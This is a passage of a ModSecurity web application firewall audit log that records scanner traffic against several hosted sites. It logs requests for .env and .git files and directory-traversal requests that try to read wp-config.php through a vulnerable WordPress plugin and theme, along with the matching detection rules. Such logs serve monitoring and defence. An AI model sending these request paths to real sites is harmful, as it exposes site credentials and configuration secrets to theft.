aiohttp/3.12.13 --bb58a144-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --bb58a144-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.env.production"] [unique_id "aE4BeNlaOcxgn8EdjwO5XQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942648301158 643837 (- - -) Stopwatch2: 1749942648301158 643837; combined=1213, p1=300, p2=822, p3=0, p4=0, p5=90, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bb58a144-Z-- --b4706861-A-- [15/Jun/2025:04:40:49.341417 +0530] aE4BeCQOy0yoNZQ7dslW8gAAAAk 185.177.72.3 55872 127.0.0.1 7081 --b4706861-B-- GET /settings/.env HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --b4706861-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --b4706861-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/settings/.env"] [unique_id "aE4BeCQOy0yoNZQ7dslW8gAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942648301539 1039972 (- - -) Stopwatch2: 1749942648301539 1039972; combined=1383, p1=331, p2=934, p3=0, p4=0, p5=117, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b4706861-Z-- --69865b08-A-- [15/Jun/2025:04:40:49.372126 +0530] aE4BeCeXHcLENIHhuFcndgAAAAU 185.177.72.3 55858 127.0.0.1 7081 --69865b08-B-- GET /.git/config HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --69865b08-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --69865b08-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.git/config"] [unique_id "aE4BeCeXHcLENIHhuFcndgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942648300948 1071247 (- - -) Stopwatch2: 1749942648300948 1071247; combined=1848, p1=388, p2=1351, p3=0, p4=0, p5=109, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --69865b08-Z-- --0c0e4f1c-A-- [15/Jun/2025:04:40:49.372277 +0530] aE4BePBViRrxRfhQ2snaQQAAAAE 185.177.72.3 55882 127.0.0.1 7081 --0c0e4f1c-B-- GET /.git/HEAD HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --0c0e4f1c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --0c0e4f1c-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.git/HEAD"] [unique_id "aE4BePBViRrxRfhQ2snaQQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942648302085 1070255 (- - -) Stopwatch2: 1749942648302085 1070255; combined=1332, p1=251, p2=995, p3=0, p4=0, p5=85, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0c0e4f1c-Z-- --550ff858-A-- [15/Jun/2025:04:40:49.393271 +0530] aE4BeOe0p2-je_NTE1ZQhQAAAAA 185.177.72.3 55890 127.0.0.1 7081 --550ff858-B-- GET /.git/index HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --550ff858-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --550ff858-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.git/index"] [unique_id "aE4BeOe0p2-je_NTE1ZQhQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942648383437 1009896 (- - -) Stopwatch2: 1749942648383437 1009896; combined=2478, p1=644, p2=1763, p3=0, p4=0, p5=70, sr=130, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --550ff858-Z-- --ac52bf6a-A-- [15/Jun/2025:04:40:49.411830 +0530] aE4BeHAK-xWqAl1k3Dz9WwAAAAY 185.177.72.3 55892 127.0.0.1 7081 --ac52bf6a-B-- GET /.env.testing HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --ac52bf6a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --ac52bf6a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.env.testing"] [unique_id "aE4BeHAK-xWqAl1k3Dz9WwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942648844509 567383 (- - -) Stopwatch2: 1749942648844509 567383; combined=2197, p1=438, p2=1672, p3=0, p4=0, p5=87, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ac52bf6a-Z-- --30ff0a2e-A-- [15/Jun/2025:04:40:49.426411 +0530] aE4BeLhvrRrlmSOg3-92GwAAAAw 185.177.72.3 55902 127.0.0.1 7081 --30ff0a2e-B-- GET /.env.local HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --30ff0a2e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --30ff0a2e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.env.local"] [unique_id "aE4BeLhvrRrlmSOg3-92GwAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942648847109 579366 (- - -) Stopwatch2: 1749942648847109 579366; combined=1269, p1=268, p2=886, p3=0, p4=0, p5=114, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --30ff0a2e-Z-- --de735532-A-- [15/Jun/2025:04:40:49.458551 +0530] aE4BeNlaOcxgn8EdjwO5XgAAAAc 185.177.72.3 55924 127.0.0.1 7081 --de735532-B-- GET /.env HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --de735532-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --de735532-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.env"] [unique_id "aE4BeNlaOcxgn8EdjwO5XgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942648946311 512301 (- - -) Stopwatch2: 1749942648946311 512301; combined=1559, p1=318, p2=1161, p3=0, p4=0, p5=80, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --de735532-Z-- --53118f76-A-- [15/Jun/2025:04:40:49.567872 +0530] aE4BeNC7wXmuvKRT4ToorwAAAA8 185.177.72.3 55922 127.0.0.1 7081 --53118f76-B-- GET /admin/.env HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --53118f76-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --53118f76-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/admin/.env"] [unique_id "aE4BeNC7wXmuvKRT4ToorwAAAA8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942648900967 666980 (- - -) Stopwatch2: 1749942648900967 666980; combined=1529, p1=319, p2=1112, p3=0, p4=0, p5=97, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --53118f76-Z-- --bc904404-A-- [15/Jun/2025:04:40:49.892052 +0530] aE4BeSeXHcLENIHhuFcndwAAAAU 185.177.72.3 55936 127.0.0.1 7081 --bc904404-B-- GET /docker/.env HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --bc904404-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --bc904404-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/docker/.env"] [unique_id "aE4BeSeXHcLENIHhuFcndwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942649373611 518504 (- - -) Stopwatch2: 1749942649373611 518504; combined=1880, p1=361, p2=1426, p3=0, p4=0, p5=92, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bc904404-Z-- --adfe554d-A-- [15/Jun/2025:04:40:49.927863 +0530] aE4BeY-PHe08tXRwhpDttwAAAAQ 185.177.72.3 55984 127.0.0.1 7081 --adfe554d-B-- GET /api/.env HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --adfe554d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --adfe554d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/api/.env"] [unique_id "aE4BeY-PHe08tXRwhpDttwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942649391661 536275 (- - -) Stopwatch2: 1749942649391661 536275; combined=2177, p1=519, p2=1575, p3=0, p4=0, p5=82, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --adfe554d-Z-- --a0224f28-A-- [15/Jun/2025:04:42:49.876997 +0530] aE4B8bdgU2RqPO-R9-XMRQAAAA0 52.169.149.155 52156 127.0.0.1 7080 --a0224f28-B-- GET /hitech-news.com HTTP/1.0 Host: www.satyakalra.com X-Real-IP: 52.169.149.155 X-Accel-Internal: /internal-nginx-static-location Connection: close --a0224f28-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 07:56:15 GMT ETag: "328-623b61f41ac0f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a0224f28-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.satyakalra.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.satyakalra.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.satyakalra.com"] [uri "/hitech-news.com"] [unique_id "aE4B8bdgU2RqPO-R9-XMRQAAAA0"] Stopwatch: 1749942769874218 2826 (- - -) Stopwatch2: 1749942769874218 2826; combined=1572, p1=313, p2=1206, p3=0, p4=0, p5=53, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a0224f28-Z-- --fee43c41-A-- [15/Jun/2025:04:44:17.808495 +0530] aE4CSbhvrRrlmSOg3-92twAAAAw 2.58.56.137 43482 127.0.0.1 7081 --fee43c41-B-- GET //wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: www.medikonindia.com X-Real-IP: 2.58.56.137 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 --fee43c41-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.22 location: https://safe-load.gotmls.net/report.php?ver=4.23.81&attack[]=FW_RevSlider&SERVER_REMOTE_ADDR=2.58.56.137&SERVER_HTTP_HOST=www.medikonindia.com&SERVER_REQUEST_URI=%2F%2Fwp-admin%2Fadmin-ajax.php%3Faction%3Drevslider_show_image%26img%3D..%2Fwp-config.php&SERVER_HTTP_USER_AGENT=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --fee43c41-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "wp-config.php" at ARGS:img. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.medikonindia.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:img: ../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. String match "/wp-admin/admin-ajax.php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/27_Apps_WPPlugin.conf"] [line "3239"] [id "222050"] [rev "8"] [msg "COMODO WAF: Directory traversal vulnerability in the Slider Revolution (revslider) plugin before 4.2 for WordPress (CVE-2014-9734)||www.medikonindia.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.medikonindia.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aE4CSbhvrRrlmSOg3-92twAAAAw"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at ARGS:img. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.medikonindia.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:img: ../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.medikonindia.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aE4CSbhvrRrlmSOg3-92twAAAAw"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match "/wp-admin/admin-ajax.php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/27_Apps_WPPlugin.conf"] [line "3239"] [id "222050"] [rev "8"] [msg "COMODO WAF: Directory traversal vulnerability in the Slider Revolution (revslider) plugin before 4.2 for WordPress (CVE-2014-9734)||www.medikonindia.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] [hostname "www.medikonindia.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aE4CSbhvrRrlmSOg3-92twAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/medikonindia.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942857563677 244893 (- - -) Stopwatch2: 1749942857563677 244893; combined=2399, p1=394, p2=1737, p3=68, p4=58, p5=141, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fee43c41-Z-- --432b5670-A-- [15/Jun/2025:04:44:18.707194 +0530] aE4CSp4hb3-ZG-auIyDYRwAAAAg 2.58.56.137 43504 127.0.0.1 7081 --432b5670-B-- GET //wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.0 Host: www.medikonindia.com X-Real-IP: 2.58.56.137 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 --432b5670-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.22 location: https://safe-load.gotmls.net/report.php?ver=4.23.81&attack[]=FW_Traversal&SERVER_REMOTE_ADDR=2.58.56.137&SERVER_HTTP_HOST=www.medikonindia.com&SERVER_REQUEST_URI=%2F%2Fwp-content%2Fthemes%2FmTheme-Unus%2Fcss%2Fcss.php%3Ffiles%3D..%2F..%2F..%2F..%2Fwp-config.php&SERVER_HTTP_USER_AGENT=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --432b5670-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "wp-config.php" at ARGS:files. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.medikonindia.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:files: ../../../../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.medikonindia.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "aE4CSp4hb3-ZG-auIyDYRwAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at ARGS:files. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.medikonindia.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:files: ../../../../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.medikonindia.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "aE4CSp4hb3-ZG-auIyDYRwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/medikonindia.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942858480492 226763 (- - -) Stopwatch2: 1749942858480492 226763; combined=2864, p1=349, p2=2389, p3=0, p4=0, p5=125, sr=87, sw=1, l=0, 